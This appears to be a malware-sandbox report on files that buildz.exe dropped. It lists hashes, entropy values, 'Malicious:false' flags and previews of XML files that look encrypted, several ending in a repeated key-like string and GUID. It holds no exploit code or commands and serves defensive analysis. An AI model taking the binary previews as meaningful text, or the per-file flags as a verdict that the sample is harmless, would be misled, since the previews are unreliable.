._)M.o..`=.......Q....G.L.....|.A..5P.+z:.n.-"...'K.F.$.n....P);...KZ>j..}..G..R.:...E.qX.%.;..%...f...1r_&.."9..[`-No..V.[.."...U./...u=ODL<....!._....c..u.Nw......Q...$[Z........gDz..5)<..#yt.vG..p_.z.v...d.....!..l{#.]..`..R8E.#.A...M6...ks..Vu.kT{...(.I...t.......U.wD)_...t...>:.@)|.*..SR....S........P...3.=...p.....~..A\..2.8).U.7....-.>.../I.p+..O..1G......!....P.\_.;..1g...j.....r.a=...$|.`.1%u..=...K>.6....W..l`q..:6...fB(..Q.~...>..G.b.....j...R......+.T.o.!..w.&.....,+7...P.......;....N..u.a..R.,b..%P^>....|p~.7...\.(j.=[..:....."...<..,W.<.p...L%...E
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1247
                        Entropy (8bit):7.835039503774742
                        Encrypted:false
                        SSDEEP:24:6qI/qUfKzQQ1vJ2huwaLqWe1ccbTgloRSPxY+06uorJ5BQK2dB3hZBPjZQRE4eVA:6quxCEYJ2c92WuccbgoRZo/OjbZOE4CA
                        MD5:45C39881FD309E4037515EDB4AB089CE
                        SHA1:058E7314DCBEE2743AFE022B3998B6802B6406BE
                        SHA-256:A147BD22919E18E709239BE4087A060F77B29C3C925F934776786120191716B1
                        SHA-512:9B5D9BB40F90DAA92377D5904E7E05CE98C2B75E6C0B1473CC81CF6B5D36B724DDB5A9EE000B9ACF0CB945B38B114857C11B4D2828E72B1328E2B5F79A45DABB
                        Malicious:false
                        Preview:<?xml.H]^.j. ..j.<../qF..P5s6....o..F,.)wzf.{:.+.be.w.|,>.}St....U.N;.....Vhe.'..........W...yP4..j'...T.Gl.f..E.oc.......9}.Y0p.?...w9Z.....9...>..J..w...!...8...S.[...b..t.>.*...9.w.x.t....A..'....?=..T.{G4..k^..a`.Q>8......."]..u..z....-3...y......l...Q...?y...|....]......d....v..%.X.....3B.]..a..zu5.^l#X.....X...T..!.D19.<.5..."ti:M...=0.......z%~.WI.."#.._r... {..#....n".?.z.N*Vm.Gn.'.. ....=b#.8.:....!..o....W.....=x...L.....BT...O...F.)O.EZ..Xo.@.e.....Q.!.%.R .'...<...6..oM-...{..|.\.*..........>q..u....D..}m.[U.....y=..^.K..i.V.......~o.#.+V.!.o...M......u.....*q6....i.(3.[....l..*6KN...w.......I[..[8.y5..s.......n..w.U..u...l.2m}.,.q..mh.kT...S....O...........Q....Sd...+-.<..aO..&.9.......pT\l.uHqS..T'..Vc8.M.Z..3/f...m...y.WO?'..!Uz#....H.M....3r...Z-p.<.%a.\<.?._....X..`B...4....d.h._.p./...._.j..C/~.V...B..y2@....4f.g.....wW..@..-J.;..En...7.I.N..\.;.b...Nb.7....H..o.n....cz........?...=Hs.F........?....h-..Iq..hA.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):950
                        Entropy (8bit):7.7695118367608185
                        Encrypted:false
                        SSDEEP:24:xZ4M/mAMklbI3rhUqfzHZfjV/VWOyGofYTcgyzXdUR3DGbD:L1le7hHfj9VTGfYwNDeVDUD
                        MD5:6B3D5A3F857460E0AC12A34D829BCC17
                        SHA1:62E9E90060088BC884CC591A42C51C4E68324190
                        SHA-256:F4952AA812F5DDC8859C9ED06E6F472E50D85AEA717C6EE3F9B18310E270160D
                        SHA-512:833D9518626AC2C3B646DDE0B7E53C727220D6EB5330699E8B964A371BBC748C12383B6C60C2A59D46E2899C96D4E141B59FE3CF51216EB1FD7FF7B5F1BFE41F
                        Malicious:false
                        Preview:<?xmltL......;n|V;...<8...I.....*=.K.)...&..dj...J.S~.n..q..HaQ......v...J.../H.&.h.DX7./.....8...Hk...k.b.........z.3J...Ol.)...A.M.L..9...Fg.....j....h....J.p....,..@y..o.&......Y.x...hD.....M...?"i.....[.3.gL.......=..K...;.u.+Nd....i.j..M...V.....z...l..........g.O*..k.]..v..H..i{.s.2..qx.....7.LI.\..W..R.bZ.b"...h_C..^....i.....9..B..d...8....{D..5..;.(.1....xcc'.....r.N ........R-.".5....-...b......(_[.e...) .R..o.K...8....q.;..Z..C..;pRA...8t.)]/O.gj......u[..4e..V.m0.tS.@S.+.....<pb...:.#...<1?. .9d........i.n|...O.?..xv.,,.nm.H=}..?......U_.}Q.w...q.s.....O.......K..6.4.K......r+.*R.v.%..3ILP...y;.d|%..p.N.r.........r..........%.J./z/q.!.U&.&H..+TNzB...T...$.G.u6O.F..w...y.0;.M.H.Z.[....c.Y..R...D!H.v`.%O..pLly)..Yj.4..vp.~.5B.kS.$..U../...,b.....Ax.K_<..+e(..E.u...N,1...@...gl...... Tu..l.....M..2 }1.-.'.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1125
                        Entropy (8bit):7.809211399395121
                        Encrypted:false
                        SSDEEP:24:dyK28i1K6VR3HB2izclcHpRAQ2Qxw3pYkr0m75oBqQIOP8SekGbD:dyhs67XB2iucYQjw3mkr0m75oBq7OP8B
                        MD5:DC6E2279E8A0BF673909DA9FA67FB8BC
                        SHA1:5C31F35FF0630DCA331660FD8D82AD02CCF1307C
                        SHA-256:C4E0C10D574549797E1A7BFA9E1EF17058C573AFF7CF76FD86EDEF5AFB6D9C62
                        SHA-512:209796E643F87656FA27C9D906A57E378756238A5A4D19D1C9981A61DDBA31DEDE2C90901EB780A7EC034F240B47CBF3CC3FA5A50E9AF443C4D7559110805F06
                        Malicious:false
                        Preview:<?xmlA@.,...}'S.hC..N`....R......:@...c*........z?.G~...?...h.......{S!.s.-....*..M......:c....O..Un...1N.}.8..9a.7..r.i.5../..=..u........>...?uQ..b.J...d......:...r...t..V...3..!...)...O.../....;[..W....,..x.zC......a.Z..}. ....Vsz..........K..0....}...e.xt....HA.+ox:.0..(...6@........d..S.*A.._.....d.._......R-.....Q...[...R....8......(5.~.>....Z..Yoh.....U...._.m..."..S..t]4-..TFVR}...2....fG....n:iW..5.a^v.qy..e...c..b(...3u\..!.p.....p..\.3..a..&.r.......z...&.........E+......fZ..=u.J.b..b.%e}.....r......HD....H.f..+Ru<s....>..<.G.3A...c*......+.~.C*...n.....`.C.H.....a...9......O-....G.7.%..f....^...n......PGK..?.V.....].........4..t:.y..G.RgU<....+..+.Eo.rq.....:.2V..C@..F.Y.td.o(P.a|..w....al&.6...D.v.<....v....e...X...(.A)0.Q.Ev...-...1...y....O......KM..m..b!........4..............g....?.i.H........`.m.y/Z>zm.c.4a.'...........rV....T..}t&.&.uG.0.]f.B.I.6..].^q.}.s......5J1@o.......S..cKa..|.u.-..#....?...l...E+X.&=.uP.U.z...eS..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1121
                        Entropy (8bit):7.797014979273351
                        Encrypted:false
                        SSDEEP:24:L6KOeNnNR6L3Cx0lwsH1kRMYpuipctnHAdRPpbK8eotI9FGbD:L6HeNnNR83H3/YpuivVReqOFUD
                        MD5:F671B0B34943A61EF177A4E76D156D43
                        SHA1:28F8DB375CB4E27860C45D51B40798CC54EA0984
                        SHA-256:0605F2D0F8D6566BDA5C6139E694C541C7F75EEC7E5D9A148F52392DBC8FEC36
                        SHA-512:DA5624EEADE540B0425FF7299C718A58654A44293B5A967B1A4F837B4175924A0405F8A9F1121C2C75E82C50D1A42D653289B1937098DDDC6635EEF677D1E63A
                        Malicious:false
                        Preview:<?xml...e....k....^..'Ju.'W.r#f..c.b.;........B+.."6.G.T.........+.K........#(...).2p..2{Dh.J..}....N.<......W...b..........H..)}zL+...N....N..w...%J.Z..........%..c?I...".`...j...Pg...P...+.B....[^.....!@....)!X^....9..D.v.+...p..$Y.Nio.WQ..`.....G82|[.u...n.9eJ.........8V..I.._B...l.W...*.Z..%.~.B"...3..P.vTF._xKE..r.A....^{.G..M(6)...6....d..e..|Kw....p7Ib+.....<7.....>~tye.An.+D..~4xAPq......=...q....H*.`.4.q.3;.-.W.OZN..9~.T.R...58r..4.9"......f...6G.!.........6.......w......A......U.9a.'<V....~_......!..SA.h.T5B.s...I.A.....~.R.X.....o/.d..(......M^yPRb.1C#.&5h..lJ....jN....`g..8.0]][q.=..)b7........6.W..J<..J.FV.p.4.....5.Q.....<.....4..J...i....R..I.....V.#....6.....!...|..A~`..g....p...m.F..-.V=r.}.....`J'.`.....|=.c.P....t...d.........*...7>.v.G.m.yc.:..K.P.zH+F....U.2.......~..]..k7I..LQ...b.....Tqn.4i.G.......Ji..u.....VL..,...3.Q..)I.....'..;......>.<.ev......[.p.IZ....h....dLY..YU....v.l.i;@.j;.....D?:w.L.6...'|....0"
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):3109
                        Entropy (8bit):7.931510305476475
                        Encrypted:false
                        SSDEEP:96:72Pfy4F4nZotOQU23VSDPFq4NLRhUlwQtA:7N4F4nZoRWPZUWQtA
                        MD5:079BE6D701AA07D24D707759D7228E74
                        SHA1:1CEE606E984A13A7352BA83A0EB87C077AB6849A
                        SHA-256:A33C8E5DE5D334B93AF8313AAEDB3F8D70B911AAE56CFD7954CBB943DDE8F8FA
                        SHA-512:3744EA274B6646393C5B0B5A6F5D861A92A4D74B7BFAFE8D44554E2C7AFF79FC7433A9E2A2E30A909B306915F74BF0D0E0A7D52EFCC368ADFB7579DCA50B8542
                        Malicious:false
                        Preview:<?xml. S...........cy....s.....%.h...:..].@..!....v&..L0.-....b..`.....Xv.....1..&?.+.qh.../.......R`....7.g..t4...)..>..%.S.V].U..U..(m.]6).."...Nt..:...f.....[...1..X..".1....c7.....W'.<J;9.z$m.$....V.Yx.t....UaI~.3.B...q_....*..H1.G..*.6....rWo..7Q.Im....#,.dz.v.L.Z.c...my...QHf..f.l!.." ..."Vtw8...U..E?)-.6.."....E.|kL.t3....2.k.S(M..RV..NP$..r.....^m.U..-l...t..<4.^.......w..c..E.'%mm...q*p....7.........p@.....A.;..]w..C....i8...s...kF...z3SEjK...B..`..d.8....Xu..7.i.../...i..Ir~.....eA,Om..&/iy.!.OI.n.7.6R."....S...9.3..._`.^}7.....<V...}....o.}z...vb..pi|.ND.....E.._..).YG.P..#...H..HI8Q.?~.?.ZZ.....u..jj.......&j>...........3.{A01.....1I..{D.L.....Z.!H.:O.}.>.bfr......8o!......, ..../.E@.}.30|q..q.'...::D.y..=.U....?.8#%..........!.m.m.^..8..K.n....^..hw...!-9O..}...:....kl.j....|..-Qq.Cv..O|'Q3.C....9G.1sc........gS..U .>.._.Cli}..Aq../.M....[c.HL.(..5...E.U"3....EL Vh+.=.X.&3@..e.. ...J1A..o.6....M.,....qo)....az..n,.s...S....`7
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2126
                        Entropy (8bit):7.90275112596146
                        Encrypted:false
                        SSDEEP:48:qvGQfHLN1ajQ6XWisXhe3JBg+jUwwEMLLfGvYdaRpaMHwEPlNgAaUD:qvG2N1ajQ6XxsxKfj3wreA4RpPLjcA
                        MD5:9A26005BF471A232964799E11D265FAB
                        SHA1:4E73B6C6930B58C0E8AA41D967D85B8502FB9B8B
                        SHA-256:17CF5EE3203D5209BABD661B01DF815D1CDDAD025ECDFB634F0E22B3FE0AC769
                        SHA-512:E858F59F609E024F8EA46C2257C2FD044EAE672A33DEF3513EAFF855F7A7AAE3B8E7DD852CEE24A600F2C6FA3843D24FD9EB368F0C1C8A7F4018C444D1250C22
                        Malicious:false
                        Preview:<?xml..TG.W..!..V.S..I......c...4>.#PZ.:e-....... ..c!:%...<..q..9<..@....=25m.o..t..=...<...t......-...\*.....*.X..<e....5......Xf...X......b..^..;.....g.F.s...A}.^../......,...{.C..$..Z.../.<.z{0.p.C.q'....W..,5.{.....8.3.......(..d.X....k.o.2~&#h...ay(]...0P.>.8 ...P.k......\xG@.]"...y.r.q5;.0.j~HCz.3.7.J_..........l.0..<P.!b..;\..2Z`Dx...j......;...(Yz'5...S..U(..9...-.........V...,..sh}.lQ....r^...N...O..1k.....O<3Z.....1...........8......I2#.l?)9..cD..ip...qY.O;..i..i.v...q.......".u....L.......ZI.d.F.iJ.d9.h.gB...".!...x.j.n....$r.....(...+Z..\.ix...<..?.F...(1.;%^..H.2eM@. ...~.u...pM.69U.(..........x.B^....b........0....dPO..h.6...!O0.5nEw9....'h.....7....^r`.I... ..8.|2..N.97.`......vC..#...nj.q.$..]?+...[?y......gTt...,.'.......d/.{.F]/...pe...?.........;o.........Ua.?..24.&..>.....:N(.<~..g.Q.S......%.."..c2H.4....}*-Q.[FTc`.,.U.o||z..y....p..h.d.!]I...\..%.`.<.O..f..G4X.X.`...}u..b..F..Eu~..@.8x)..,.~.Y[.pF..X...1......#T
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1387
                        Entropy (8bit):7.853713623233804
                        Encrypted:false
                        SSDEEP:24:xDW0dfCTroJTeuwOInXFOZ3n0vFIO/W+z+ATay+kelFm5DCYJwlTd2C2nJ/Ku6LY:o0tCgxIXIJGuO/W+6GaQGFM2YClp2lKA
                        MD5:337C09A5A18D5C175713AFA43548CCE7
                        SHA1:73DF7D10B047ED053D7ABF49B0629259F18F6A63
                        SHA-256:10F5849BA8770F2F1B16A0E33843D655FAF545CA37EC6C8E11E50CF58722954D
                        SHA-512:7CC00D32EFEB2BE7A0FBE565E72F74BF1B1B1B6CA72AB41C63656CB2E6E15E61679F2F5C3B1E3380191E76CEC14864F7EA1BD9AC28A7897C638799813A6C4C29
                        Malicious:false
                        Preview:<?xml.....n.?_.........v.pi....(.n.....Fl$...-.Q.=...%..V..nHT.Z..f.!.9....<..ts..C<.{>....[='..).....U.X...:.wz.bu..4r..B.......O..2.P.!.....&{..J.H...).#.&m....&.t1`.P.....n.b.G@...b.`..d................_.....cN=.....o.^..o.ju....\`/.|g.@.K[@....8.H......YC.W..gK..'..a9...m.q..6......b.......D../.4.m.z4...*Y7....-.../...a.....S..e.]d..k5.D...v.<kD....]O.+w..S.......V.*..u.}........{\............4...#3.......j.Fd.:.....a.#wA...'1...*V.(..;..&..V&R.Y.^R..Z.......eL..j....Q.w.../.../.0.U....'....\...e.@..|7..;@qOhHr.`"<...3?..>v.H:[.MSQ../m.XR.....X.\.!.C5...3.%...O.Pz>+].7...._{....u.K1>.."..0......0..r2..`......&.>O...f..C...6.{=Ybu.:........M?..D .H(.|.S..s...h...[.v.........;..v:]=...@s..l.X...F=......f.<.Ki..d.''..1G..bg...BCj.....b..A.F...DB...v8..k.u.I ...=.yS.3.t.....r}...D.W..Y=N......XJ......#.......I....g..wL.^...B._}.<.....L..W...z..I.:".B.u..ad...E..F..`DR.M.C..e.N...SqW&._t.a...0....6.{...r3.%.W.....I..)....+...nB.O.F.(@=..>.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):754
                        Entropy (8bit):7.7001604145106555
                        Encrypted:false
                        SSDEEP:12:lgt0hxqZk00hFUoqsFoFtnzsl/iYsNXRKqFBAnnvEODufK7Dw1e2LRhZuCz26Gcq:lgt+qZ14FswIF5RK+BMncOqSnw1/LvZ6
                        MD5:59B20A1F3530764732083E7E427504F1
                        SHA1:9323196AB986B36DC42AEF8D7A4F9A3E63C0298F
                        SHA-256:6C4347AE0FA49274AFCB106CCB8B2CB7697A7780B5E67E069762A816FCB5A6A3
                        SHA-512:FDE3E9CF1FED05AC475FAB9C0D83C7184F0392069C6B803C63E4ABF6D27D88FD9BABA836864DE3E252E7E5BE89C0BD674332FCAA3827E1386AC7CEC09F78F336
                        Malicious:false
                        Preview:<?xml..Y....%...M.u2.HR..F.....E{.g..UYh.hxT..O'.o.....c'6c..3../....F4.5...T2.h.....N.f..?/.-....Sq.RQ...;~.....A..73.0.....%.Z...hd.......ZJa..N..x.O..=.....|G1.H....5..r9@.]..s.;I....7..WSs..*..rb..hm..J<C;5..pM.%...6-..H...I&..n09..V....T.L..*.&-.......c{9..JN.L1{a.b..).q..O.."...."..._..">.....5n=...t..zr.f...U..y=....\R....?......O..A.F..K..5.9.S$.<&;.!.......u..'.u..|..L...B...o.....&..`.]..\..js.Q...g.[K....T.D...#2T......S.,..........e.......wWEak.A..S.t3z@%^s,.16f.AZ..ze...@...?L.3...;.]....%/6...m..Y.~+Y.~.K...$=....9^4....^...C/E.3p.m......q..$.1...VY.z].w.3.O..'....5]P.*V....p..s.....y.-N..<....L.....9*t.'.J........T.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1399
                        Entropy (8bit):7.8738194911453
                        Encrypted:false
                        SSDEEP:24:oQwazyLIUDey7r+tQLF5W0jJxkJx80LpGk2K1jThx8wp3haeroR+Nzm+GbD:7wazyLIcBr+tyBJmJpG1iZx8wHI+lm+A
                        MD5:33D107E018D186160F41C26C71EDD389
                        SHA1:9E16B300191C194A3A50CAF8CE0D92851A3E74B5
                        SHA-256:8F0378B2A3C856D091B07E3617A9468F992D778F51966608D62C24603EF677A5
                        SHA-512:D461E62E137924F9BB71F7CB5E31FE3573762F4813DD547871168D3ED03DBC659C505AE5E9EE47C0C232BF9428410B3D51DD489A048799E457D26EE4A2F4B607
                        Malicious:false
                        Preview:<?xmlU).|.)+@XA...T...SG...W..?\...4=8.....d.....H,..Y.9..._.+j#v.=O%..g.r..w...c.U..K.>.#bx{..=G.Bz.;...9F.....h.....o...N.).._*C....t2.OE8}.phBX.:.{[..<.........,.........S_.@....#.C..+..!.....v$.i....EE.{R!$~|;.c,.......\.......8.J..........4d.h....R.:.nbNw........P...\.i......TZ3.....J.C5..7..6*.y8.3]^......8o.h.rHhG. ..T.K.w\..J."......!.P.A... .7H..:..3V'.8. ....=2..-..pF .t&.....#gF... +..R...%..f.........s,..@....[.}..{....*....k.k..b........8.Dx.r..F/...}...V....T.....xpc..re.'Cf.q......b...X?...:&..Y..MG....\...P..[.....OAp..x.(.<2..q,.tT..z....(...ZM.C.y..-.....T...Q[.^v\,..i.....0.M...R....2.O.AsPIwR......IA....H..[..........Z.O..V.7,ae...>Yy....w.N....{.E..:....V...%.....&.u.....E.....*g..^k..Yg.rM ".;3U......>./...?/.z=..W.._......g.(./....).y.......O...ar...a..7....+..(2..5.Kd.9....5.......=.B..3.K..9r.M%L.9....<..$._..~.(..z..dV....6:O..`..x.~+.y.y.......4..L..._.Ym.!.6...]...R..%..J..]I..%vD..T.X..v@."...=...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):708
                        Entropy (8bit):7.637572872527421
                        Encrypted:false
                        SSDEEP:12:ieWJYHal7sBDuTazaNzLtm4A5dcBkXi6ZZjMA92DG8p5irFYlu/YWEq4GO26GciD:TWJYHa2lca25tm4GIkdZZcGyuAlGcGbD
                        MD5:6419301CE53B68D57BB22DB006868219
                        SHA1:3C077FC837573D838D04C123E5FFE640213C1EFD
                        SHA-256:260987685E2231BF48C481BB5CEB2DD660E0AA65649797E5FACD5F8CC044D861
                        SHA-512:4E17D880A5078EF1A3A96AF2CF892ADAD4001D1FEF6C351F70B2C8DCD7667A13065B1376CFEB96E751520404D24DD3BF6DE050B9C3C1F93D19ADD4904F59F2AE
                        Malicious:false
                        Preview:<?xml8......i.....,s...J(.n1...n.q`Y..6(z...l|.5].:K.=.[....|Y..K.v..S...?....o4..MQ.g$=...jJ;y.-FD9E...j.KTI...i..|.G..?...$.|....O..|.ap-...!..n.[._.x4.DF...a95....^W...|.C.n.8q.J.4A.4b.. 6......Y..n........S...?.pK...t"..9.....xD.f..OFQaPZ/ya..Jr...D..'D....lU.....A....l........+x.`?..$.k..d.9.]./..#"I../..b. q|.c.]...V(.............0.*....5....|..u......P1`....J......xpJq....6Q..^...v..k...K...2.^.....;.@.8.....K..v...6.....X.w....k...m...*...W.v....9.z..MY.Kk..7....K].4.>.n..[.x.u..`...y..k.t....p..L-,.^.&N...*Jtd....o...w-.{L..............=.s.|H..M..Y).+..:....~.*.....#.?EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1132
                        Entropy (8bit):7.795973662970275
                        Encrypted:false
                        SSDEEP:24:WAH7m9rgvUCS5tPSF5mKhtkZPSdM6FLjJW5SCdI3FMcI8b2G9GbD:xm9rgvUCuPSD6SdM6VU5S5yVG9UD
                        MD5:5A4E45D7D59784B0371DA0CB93308DFB
                        SHA1:1FC85F85420C9DE5DEC67FF50E0AA13809ACE2EC
                        SHA-256:438E0633558F3050C13827CD3DB70CD5CC3DAF3605DD9F484E2F7B84A86AD52C
                        SHA-512:478B9617903218A4532F60849730A7AFBC72EBBDA53CC668F7A568903BCF0BEDEC9CF1052D516B6B6CD5FCFD7D5E34CD58238204239F2BDCE60C72E9C2ABC4C1
                        Malicious:false
                        Preview:<?xml.....w.r...]-.%;....^........:.i........8~A.E........I.Zk...qp..q.....C.7....5.h?XR....a....g..P.P..-=m.F...nQ4.Ba..x=.-.d5..+...z.DB.R.8.......7i..T.pr.^.6J..C.Y7.s'.S"...gS*10.ARU-2..[....>K!... Y.*......s...HT.....E..z.x...`Bw.${...L...J..5s.I7...K...b....D1.#..>.._!,..:..K..6...3..g.tT.^.;...k./....l..A..s.'.r.....$FhI..a.F....L.....Y....$.n..8.q.5.yyp3:.........0....|u...:2w..d..M....m.........@...X..H..k.....E.Q.C..WPw\..EF1.7....<R..r..74f...1.~.\j.N6.#(.v..L...t.E^.J...UC...4..............c...x.....\..olE9.K72R8h.b.u+.~y....>.{..sE.PU.J!\EI .{.i../.|~....{-.7;/.+zq....,*k.>;.....6...\.*.5n..V.).......5K\T..e.K..i.1,..7.....2..f./:.....!.....N....-.H.qlx.....8.q...."+<c..w.Szg#...=.8....}6.m.(.!..9..-.A(.....qek..l.VK.P..F.R+...;[.T.....U.....\.}.......aM....$..dC.y.j......8.h..]..+.$.+.9g..;........=.......v.^..".3.bt.o4an.....TF8.6D...U.$.F.0d7L......f...p..}P.Xw.1..e.].'E..!xp....".I.6. ..r...p..5....XA.V....Mc3..**eJ
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):752
                        Entropy (8bit):7.652098414054581
                        Encrypted:false
                        SSDEEP:12:wUF1XXBuq7xRgEfn8p/H7HH4z5wXLxSJfl51Kxox+yAhckQMMbUGEPzS3426GciD:woZBuybJkRUzGXNSUW+y6XQMfG8zfGbD
                        MD5:761DE0A0C2427B8F181D67A71662155C
                        SHA1:EAF8430FBF19DA1A3B7715467293C2ECF1E3DAB6
                        SHA-256:4120496CD56E1D6156008130068230D1632983122EC5CA6E05157793C38D3B6F
                        SHA-512:0D1903C6035E3158AC72463B1D0E93949CDF6644030B2D6ECEBFEAEC3B77BAD2832D3A171CE239447906FDB0B030A14E25BC6559BA8B023E05E874DBCC2A6800
                        Malicious:false
                        Preview:<?xml....6H../.VW...hX.r;..Ph..:1......! ..z.u.S...._........F*...8FPVKl.........7..VQ.....[...t..rr..U..,.j#-..l.U5.cV...9...y...[...#.3m:79#.GW..#..`.Z}...(8..|..sY@.....|,..........t8..0.....H.u$6..A..^Yf......`...3.....=3...\...)<)?..-...N.D,.!@>..>Z.og..2....h~"i...K..-...lPPn...........i...M.d...`.%....[E-.j.K....G....>.Z.L ..z.'.zh.V.Y...Hc....9<..T....`.2<.R..=Ea.D\/..xD...zB,...p....-;t;..FM...NY5..#X..E.R......(s.G.e...2....G.D...\.lz{V4!..*j....,...1vBi(....E=F........<.."....!n.#..g..i.5.! 8........o..2T..B.8'........C....#.&....I...4....".......*....Q{..ViB...C..eaf!..D.....*W......;....O0.(5..z.QL..jWJ>.h.8...SJ^s..U/.<KEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1094
                        Entropy (8bit):7.802681864204032
                        Encrypted:false
                        SSDEEP:24:er+8/N98SLV9akPD7soy6LsgL2ZpC/+lcm04GmCXTGbD:eDbZV9ak/ESam/+SmIXTUD
                        MD5:0E82F22BD044CCABFC615A85B9B468C1
                        SHA1:8EA4E92B679A5F64E2AEC30C63A559916BC53910
                        SHA-256:C056B24AB45EBCFBB5FC2C02D1D1D5ED730953FB240C832471BD6F21B59FFFE1
                        SHA-512:CC7FB1F907ED0318242FF38413876265EE20DF181001945841C24DCE05C78CAC860868A0F3ADB9698A6EABF94F262E8A0C5EE43EA89F4680DFA47D8F48FF265E
                        Malicious:false
                        Preview:<?xml...T.`U/...;@JMw....7{R.....8=.<......y..........<|.J....u&.e....].......`.c.-..Y.A.t.X8.<.~..I>.........mt.=C.I...:.ne..j* ...v;.._.?........@Y<............P.#..R96.G..9l.% ...3;..i..Y....}..ab.../.... ...zI..Rf..=.........]..N.w>)...;..N1wT.7...N....{5.........Y.4W.j..~<...)..}.%h...Hr[. .... *...p.6..C.:..6.+..o....?...?/j0";...?.N...e.5...b%,J..i...o.8...%.I....T.)..u.>d...'h.Y]...z....8...Tf..C...=t3R...I........\....P.}+..@.V..<..z.t..W.%.#.I..<..0..o...;..ZH.v.PM..F-HM2...4....#-5..L..........NB...Z.8x.:d.].:F......5.w..J6.E.H)u.u..+2/..PO.....*.#..0xB..%k.Q4cW...J........m....t..B.b...E4.E`...=.}..'.....;.>...^Y\...9V... ...B..|w.$}..7[.[..'JC.f...f/9..+....o1~&\z..:\[..i.....[[..`*@T...*..0...p..u..V...". .=.bO.J...=.U..F.Fnc..).a.)@&-sD..[..{.[.=4;KC.......dG.....~!.)...h..p.n........k,..?..%..F-".3M..h..Jy...%....[.C......:Iwu+..Cw.sE...I....i1..u.S.AY!b.nj...k..8..?9;...&.>...2BI...1Z.~Zm.....J....N..S.(e..*.s.W..Z.'
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8095
                        Entropy (8bit):7.9741631353441775
                        Encrypted:false
                        SSDEEP:192:mNgpSfgKkQzP6inGi91kqTvB+TxyAgoQKA:LpZHQr6EzB+Txn1A
                        MD5:5EBB9F47B1CF9991A7A5987EB81971C1
                        SHA1:2055AACE338335AA3F4675AA0E468922A6E58F9E
                        SHA-256:6A4D92B2A74CBB87418060AE5293534D1169F7E4FA6B841F11EC55D8508C5131
                        SHA-512:E2BEBF6AA5B85BCDCC5B1F8981A964DBEBD63FF3F48906527E6CE310899E0BFEA4998F7B7E034DE43FF285F757A5E766B0A41E75D730F037242F2CCF1E05C833
                        Malicious:false
                        Preview:<?xml..Lg.Bv.C .d.....9.....?..k...Er.q|.....k....OH^...D;.+...O4=.:>k:.....8.'.LX.!..R.......iI.f.....^t..GIaX.<....0.S.(....cU..^G.E.s.qn.....c.:..Lk.t.....u.G/..s............fn6wS_.N(..;Xu.In&..x..l.H.."vc\.6.....\...3''<dR..qZ.\..b.../.J.&.a.......l..."....%...7.`f.:=..N..a.^.`.>..<....c.>..7.._...&.u.......k..6.M;.gE..5L(./R.j.4`y..j.m.'....{.W....O....a.......r.Oy.}.4....!m.u..r!)\....ZO..Q..........I]....%4.S..Fl.G..[V..t...+...o.}iU..0.5p...X.;bM..q...S.6.0F...l.?......Na.{............y\.[.BZ\.....j..~?..."...`../Kn~.\.\.3.J..j\..f.(..Mx..c...H....Lu..w$._....P.-1.....8.M...a.1...c....(K8s[..5qs`.H^.$.XK77<.m+.|LI......:5.&..{.jW....G.....T..lT....X.... .4.y!....=.n0v7..Kc..7...?)J.Rl.....&..?.x...K.O..E.5.%..R4.s.t...?...'.."......P....|.C6s..D.....K....pH..W.G........Q.5....D....t...w.~..3.Mnks..`.T.......y...M.,.....;.....W..Jc....UH.c4...a:.:v..q...t...`Cml.A=.....|..y!....U[..?....+...|}.u>c.u....Dw...N....tk......1....^.l.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1047
                        Entropy (8bit):7.815771564169549
                        Encrypted:false
                        SSDEEP:24:nfLLUOoaZKkxua9UMAri1h1zpfn7Ei5YCGbD:fLTlKkxua9USpzpf7Ei5XUD
                        MD5:FDA82E30BB6882C0D174037F80295514
                        SHA1:425B1421C6EFDDCBF154BCA994B56FB8DBE189F8
                        SHA-256:879CDEB6E9C44336BE10103A9D95AD52641865B85B440359593B3D81AE1C1DE7
                        SHA-512:A036D01E9CB21D98AF4AAC247213BC89F7722FD76F45E1AEEAFD6D31B677B1712E5AAEDE5A7513BBDBDFBB05D732FD8A361232F092C1C76EB095ED0F7C821766
                        Malicious:false
